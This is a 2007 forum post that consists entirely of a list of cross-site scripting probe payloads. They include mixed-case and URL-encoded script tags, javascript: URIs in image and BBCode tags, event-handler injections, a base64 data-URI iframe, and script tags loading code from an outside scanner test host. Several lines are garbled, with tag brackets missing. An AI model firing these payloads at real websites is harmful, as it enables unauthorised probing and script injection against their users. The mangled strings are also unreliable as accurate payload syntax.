zyp posted on 2007-7-15 22:23:32

Some simple XSS probe scripts

alert(123456)%3B
>'>/ScRiPt>
>">/ScRiPt>
ScRiPt%20%0a%0d>alert(123456)%3B/title>/ScRiPt>
-->/ScRiPt>
email@some/ScRiPt>domain.com
[img]JaVaScRiPt:alert(123456)%3B[/img]
%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28123456%29%3B%22%3E
/script>
script>t>alert(123456)%3B/script>t>
FRAMESET>/FRAMESET>
%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28123456%29%3B%22%3E
iframe+src=http://www.winshell.cn/read.php/"data:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo="+invalid="123456">
body+onload=alert(123456)>
ScRiPt+src=http://testphp.acunetix.com/xss.js?123456>script/xss+src=http://testphp.acunetix.com/xss.js?123456>img+src=http://testphp.acunetix.com/dot.gif+onload=alert(123456)>
+style='background:url(JaVaScRiPt:alert(123456))'+invalidparam='
%253CScRiPt%253Ealert(123456)%3B%253C/ScRiPt%253E
/ScRiPt>
"+onmouseover="alert(123456)
ScRiPt%20%0a%0d>alert(123456)%3B</ScRiPt>